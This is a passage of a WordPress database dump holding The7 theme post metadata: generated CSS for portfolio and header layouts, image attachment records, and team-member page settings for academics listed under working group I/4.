.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(15496,2856,'_wp_page_template','default'),
(15497,2856,'_dt_microsite_primary_menu',''),
(15498,2856,'_dt_microsite_split_left_menu',''),
(15499,2856,'_dt_microsite_split_right_menu',''),
(15500,2856,'_dt_microsite_mobile_menu',''),
(15501,2871,'_wp_attached_file','2022/10/m1-4.jpg'),
(15502,2871,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:624;s:6:\"height\";i:351;s:4:\"file\";s:16:\"2022/10/m1-4.jpg\";s:8:\"filesize\";i:164068;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"m1-4-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12194;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"m1-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6097;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15504,2872,'_edit_lock','1665868102:1'),
(15505,2873,'_wp_attached_file','2022/10/ws63.jpg'),
(15506,2873,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:153;s:6:\"height\";i:198;s:4:\"file\";s:16:\"2022/10/ws63.jpg\";s:8:\"filesize\";i:37335;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"ws63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5058;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15507,2872,'_thumbnail_id','2873'),
(15508,2872,'_edit_last','1'),
(15509,2872,'_dt_sidebar_position','disabled'),
(15510,2872,'_dt_sidebar_widgetarea_id','sidebar_1'),
(15511,2872,'_dt_sidebar_hide_on_mobile','0'),
(15512,2872,'_dt_footer_show','1'),
(15513,2872,'_dt_footer_widgetarea_id','sidebar_2'),
(15514,2872,'_dt_footer_hide_on_mobile','0'),
(15515,2872,'_dt_header_title','fancy'),
(15516,2872,'_dt_header_background','normal'),
(15517,2872,'_dt_header_background_below_slideshow','disabled'),
(15518,2872,'_dt_header_transparent_bg_color_scheme','light'),
(15519,2872,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(15520,2872,'_dt_header_transparent_top_bar_bg_opacity','25'),
(15521,2872,'_dt_header_transparent_bg_color','#000000'),
(15522,2872,'_dt_header_transparent_bg_opacity','50'),
(15523,2872,'_dt_header_disabled_background','normal'),
(15524,2872,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(15525,2872,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(15526,2872,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(15527,2872,'_dt_header_disabled_transparent_bg_color','#000000'),
(15528,2872,'_dt_header_disabled_transparent_bg_opacity','50'),
(15529,2872,'_dt_page_overrides_top_margin',''),
(15530,2872,'_dt_page_overrides_right_margin',''),
(15531,2872,'_dt_page_overrides_bottom_margin',''),
(15532,2872,'_dt_page_overrides_left_margin',''),
(15533,2872,'_dt_mobile_page_padding_top',''),
(15534,2872,'_dt_mobile_page_padding_right',''),
(15535,2872,'_dt_mobile_page_padding_bottom',''),
(15536,2872,'_dt_mobile_page_padding_left',''),
(15537,2872,'_dt_fancy_header_layout_heading',''),
(15538,2872,'_dt_fancy_header_title_aligment','center'),
(15539,2872,'_dt_fancy_header_height','300'),
(15540,2872,'_dt_fancy_header_padding-top','0px'),
(15541,2872,'_dt_fancy_header_padding-bottom','0px'),
(15542,2872,'_dt_fancy_header_breadcrumbs_heading',''),
(15543,2872,'_dt_fancy_header_breadcrumbs','disabled'),
(15544,2872,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(15545,2872,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(15546,2872,'_dt_fancy_header_title_heading',''),
(15547,2872,'_dt_fancy_header_title_mode','custom'),
(15548,2872,'_dt_fancy_header_title','Leila Hashemi Beni ,North Carolina A&T State University, USA (WG I/4)'),
(15549,2872,'_dt_fancy_header_title_font_size','30'),
(15550,2872,'_dt_fancy_header_title_line_height','36'),
(15551,2872,'_dt_fancy_header_text_transform','none'),
(15552,2872,'_dt_fancy_header_title_color_mode','color'),
(15553,2872,'_dt_fancy_header_title_color','#ffffff'),
(15554,2872,'_dt_fancy_header_subtitle_heading',''),
(15555,2872,'_dt_fancy_header_subtitle',''),
(15556,2872,'_dt_fancy_header_subtitle_font_size','18'),
(15557,2872,'_dt_fancy_header_subtitle_line_height','26'),
(15558,2872,'_dt_fancy_header_subtitle_text_transform','none'),
(15559,2872,'_dt_fancy_header_subtitle_color_mode','color'),
(15560,2872,'_dt_fancy_header_subtitle_color','#ffffff'),
(15561,2872,'_dt_fancy_header_bg_heading',''),
(15562,2872,'_dt_fancy_header_bg_color','#222222'),
(15563,2872,'_dt_fancy_header_bg_image_origin','custom'),
(15564,2872,'_dt_fancy_header_bg_image','a:0:{}'),
(15565,2872,'_dt_fancy_header_bg_repeat','no-repeat'),
(15566,2872,'_dt_fancy_header_bg_position_x','center'),
(15567,2872,'_dt_fancy_header_bg_position_y','center'),
(15568,2872,'_dt_fancy_header_bg_fullscreen','1'),
(15569,2872,'_dt_fancy_header_bg_overlay','0'),
(15570,2872,'_dt_fancy_header_overlay_color','#000'),
(15571,2872,'_dt_fancy_header_bg_overlay_opacity','50'),
(15572,2872,'_dt_fancy_header_scroll_effect','default'),
(15573,2872,'_dt_fancy_header_bg_parallax','0.5'),
(15574,2872,'_dt_fancy_header_responsiveness_heading',''),
(15575,2872,'_dt_fancy_header_responsiveness','enabled'),
(15576,2872,'_dt_fancy_header_responsiveness_switch','778px'),
(15577,2872,'_dt_fancy_header_responsive_height','70'),
(15578,2872,'_dt_fancy_header_responsive_font_size','30'),
(15579,2872,'_dt_fancy_header_responsive_title_line_height','38'),
(15580,2872,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(15581,2872,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(15582,2872,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(15583,2872,'_dt_teammate_options_go_to_single','1'),
(15584,2872,'_dt_teammate_options_position',''),
(15585,2872,'_dt_teammate_options_website',''),
(15586,2872,'_dt_teammate_options_mail',''),
(15587,2872,'_dt_teammate_options_facebook',''),
(15588,2872,'_dt_teammate_options_twitter',''),
(15589,2872,'_dt_teammate_options_dribbble',''),
(15590,2872,'_dt_teammate_options_you-tube',''),
(15591,2872,'_dt_teammate_options_rss',''),
(15592,2872,'_dt_teammate_options_delicious',''),
(15593,2872,'_dt_teammate_options_flickr',''),
(15594,2872,'_dt_teammate_options_lastfm',''),
(15595,2872,'_dt_teammate_options_linkedin',''),
(15596,2872,'_dt_teammate_options_vimeo',''),
(15597,2872,'_dt_teammate_options_tumbler',''),
(15598,2872,'_dt_teammate_options_pinterest',''),
(15599,2872,'_dt_teammate_options_devian',''),
(15600,2872,'_dt_teammate_options_skype',''),
(15601,2872,'_dt_teammate_options_github',''),
(15602,2872,'_dt_teammate_options_instagram',''),
(15603,2872,'_dt_teammate_options_stumbleupon',''),
(15604,2872,'_dt_teammate_options_behance',''),
(15605,2872,'_dt_teammate_options_px-500',''),
(15606,2872,'_dt_teammate_options_tripedvisor',''),
(15607,2872,'_dt_teammate_options_vk',''),
(15608,2872,'_dt_teammate_options_foursquare',''),
(15609,2872,'_dt_teammate_options_xing',''),
(15610,2872,'_dt_teammate_options_weibo',''),
(15611,2872,'_dt_teammate_options_odnoklassniki',''),
(15612,2872,'_dt_teammate_options_research-gate',''),
(15613,2872,'_dt_teammate_options_yelp',''),
(15614,2872,'_dt_teammate_options_blogger',''),
(15615,2872,'_dt_teammate_options_soundcloud',''),
(15616,2872,'_dt_teammate_options_viber',''),
(15617,2872,'_dt_teammate_options_whatsapp',''),
(15618,2872,'_dt_teammate_options_reddit',''),
(15619,2872,'_dt_teammate_options_snapchat',''),
(15620,2872,'_dt_teammate_options_telegram',''),
(15621,2872,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(15622,2874,'_edit_lock','1665868092:1'),
(15623,2875,'_wp_attached_file','2022/10/ws64.jpg'),
(15624,2875,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:148;s:6:\"height\";i:198;s:4:\"file\";s:16:\"2022/10/ws64.jpg\";s:8:\"filesize\";i:55549;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"ws64-148x150.jpg\";s:5:\"width\";i:148;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7018;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15625,2874,'_thumbnail_id','2875'),
(15626,2874,'_edit_last','1'),
(15627,2874,'_dt_sidebar_position','disabled'),
(15628,2874,'_dt_sidebar_widgetarea_id','sidebar_1'),
(15629,2874,'_dt_sidebar_hide_on_mobile','0'),
(15630,2874,'_dt_footer_show','1'),
(15631,2874,'_dt_footer_widgetarea_id','sidebar_2'),
(15632,2874,'_dt_footer_hide_on_mobile','0'),
(15633,2874,'_dt_header_title','fancy'),
(15634,2874,'_dt_header_background','normal'),
(15635,2874,'_dt_header_background_below_slideshow','disabled'),
(15636,2874,'_dt_header_transparent_bg_color_scheme','light'),
(15637,2874,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(15638,2874,'_dt_header_transparent_top_bar_bg_opacity','25'),
(15639,2874,'_dt_header_transparent_bg_color','#000000'),
(15640,2874,'_dt_header_transparent_bg_opacity','50'),
(15641,2874,'_dt_header_disabled_background','normal'),
(15642,2874,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(15643,2874,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(15644,2874,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(15645,2874,'_dt_header_disabled_transparent_bg_color','#000000'),
(15646,2874,'_dt_header_disabled_transparent_bg_opacity','50'),
(15647,2874,'_dt_page_overrides_top_margin',''),
(15648,2874,'_dt_page_overrides_right_margin',''),
(15649,2874,'_dt_page_overrides_bottom_margin',''),
(15650,2874,'_dt_page_overrides_left_margin',''),
(15651,2874,'_dt_mobile_page_padding_top',''),
(15652,2874,'_dt_mobile_page_padding_right',''),
(15653,2874,'_dt_mobile_page_padding_bottom',''),
(15654,2874,'_dt_mobile_page_padding_left',''),
(15655,2874,'_dt_fancy_header_layout_heading',''),
(15656,2874,'_dt_fancy_header_title_aligment','center'),
(15657,2874,'_dt_fancy_header_height','300'),
(15658,2874,'_dt_fancy_header_padding-top','0px'),
(15659,2874,'_dt_fancy_header_padding-bottom','0px'),
(15660,2874,'_dt_fancy_header_breadcrumbs_heading',''),
(15661,2874,'_dt_fancy_header_breadcrumbs','disabled'),
(15662,2874,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(15663,2874,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(15664,2874,'_dt_fancy_header_title_heading',''),
(15665,2874,'_dt_fancy_header_title_mode','custom'),
(15666,2874,'_dt_fancy_header_title','Luis Miguel González de Santos ,University of Vigo, Spain  (WG I/4)'),
(15667,2874,'_dt_fancy_header_title_font_size','30'),
(15668,2874,'_dt_fancy_header_title_line_height','36'),
(15669,2874,'_dt_fancy_header_text_transform','none'),
(15670,2874,'_dt_fancy_header_title_color_mode','color'),
(15671,2874,'_dt_fancy_header_title_color','#ffffff'),
(15672,2874,'_dt_fancy_header_subtitle_heading',''),
(15673,2874,'_dt_fancy_header_subtitle',''),
(15674,2874,'_dt_fancy_header_subtitle_font_size','18'),
(15675,2874,'_dt_fancy_header_subtitle_line_height','26'),
(15676,2874,'_dt_fancy_header_subtitle_text_transform','none'),
(15677,2874,'_dt_fancy_header_subtitle_color_mode','color'),
(15678,2874,'_dt_fancy_header_subtitle_color','#ffffff'),
(15679,2874,'_dt_fancy_header_bg_heading',''),
(15680,2874,'_dt_fancy_header_bg_color','#222222'),
(15681,2874,'_dt_fancy_header_bg_image_origin','custom'),
(15682,2874,'_dt_fancy_header_bg_image','a:0:{}'),
(15683,2874,'_dt_fancy_header_bg_repeat','no-repeat'),
(15684,2874,'_dt_fancy_header_bg_position_x','center'),
(15685,2874,'_dt_fancy_header_bg_position_y','center'),
(15686,2874,'_dt_fancy_header_bg_fullscreen','1'),
(15687,2874,'_dt_fancy_header_bg_overlay','0'),
(15688,2874,'_dt_fancy_header_overlay_color','#000'),
(15689,2874,'_dt_fancy_header_bg_overlay_opacity','50'),
(15690,2874,'_dt_fancy_header_scroll_effect','default'),
(15691,2874,'_dt_fancy_header_bg_parallax','0.5'),
(15692,2874,'_dt_fancy_header_responsiveness_heading',''),
(15693,2874,'_dt_fancy_header_responsiveness','enabled'),
(15694,2874,'_dt_fancy_header_responsiveness_switch','778px'),
(15695,2874,'_dt_fancy_header_responsive_height','70'),
(15696,2874,'_dt_fancy_header_responsive_font_size','30'),
(15697,2874,'_dt_fancy_header_responsive_title_line_height','38'),
(15698,2874,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(15699,2874,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(15700,2874,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(15701,2874,'_dt_teammate_options_go_to_single','1'),
(15702,2874,'_dt_teammate_options_position',''),
(15703,2874,'_dt_teammate_options_website',''),
(15704,2874,'_dt_teammate_options_mail',''),
(15705,2874,'_dt_teammate_options_facebook',''),
(15706,2874,'_dt_teammate_options_twitter',''),
(15707,2874,'_dt_teammate_options_dribbble',''),
(15708,2874,'_dt_teammate_options_you-tube',''),
(15709,2874,'_dt_teammate_options_rss',''),
(15710,2874,'_dt_teammate_options_delicious',''),
(15711,2874,'_dt_teammate_options_flickr',''),
(15712,2874,'_dt_teammate_options_lastfm',''),
(15713,2874,'_dt_teammate_options_linkedin',''),
(15714,2874,'_dt_teammate_options_vimeo',''),
(15715,2874,'_dt_teammate_options_tumbler',''),
(15716,2874,'_dt_teammate_options_pinterest',''),
(15717,2874,'_dt_teammate_options_devian',''),
(15718,2874,'_dt_teammate_options_skype',''),
(15719,2874,'_dt_teammate_options_github',''),
(15720,2874,'_dt_teammate_options_instagram',''),
(15721,2874,'_dt_teammate_options_stumbleupon',''),
(15722,2874,'_dt_teammate_options_behance',''),
(15723,2874,'_dt_teammate_options_px-500',''),
(15724,2874,'_dt_teammate_options_tripedvisor',''),
(15725,2874,'_dt_teammate_options_vk',''),
(15726,2874,'_dt_teammate_options_foursquare',''),
(15727,2874,'_dt_teammate_options_xing',''),
(15728,2874,'_dt_teammate_options_weibo',''),
(15729,2874,'_dt_teammate_options_odnoklassniki',''),
(15730,2874,'_dt_teammate_options_research-gate',''),
(15731,2874,'_dt_teammate_options_yelp',''),
(15732,2874,'_dt_teammate_options_blogger',''),
(15733,2874,'_dt_teammate_options_soundcloud',''),
(15734,2874,'_dt_teammate_options_viber',''),
(15735,2874,'_dt_teammate_options_whatsapp',''),
(15736,2874,'_dt_teammate_options_reddit',''),
(15737,2874,'_dt_teammate_options_snapchat',''),
(15738,2874,'_dt_teammate_options_telegram',''),
(15739,2874,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(15740,2874,'rs_page_bg_color',''),
(15741,2872,'rs_page_bg_color',''),
(15742,2876,'the7_shortcodes_dynamic_css','a:1:{s:32:\"f194fb3ae82043b7f3091632228c3686\";s:6838:\".dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media {\n  padding: 15px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media img {\n  max-width: 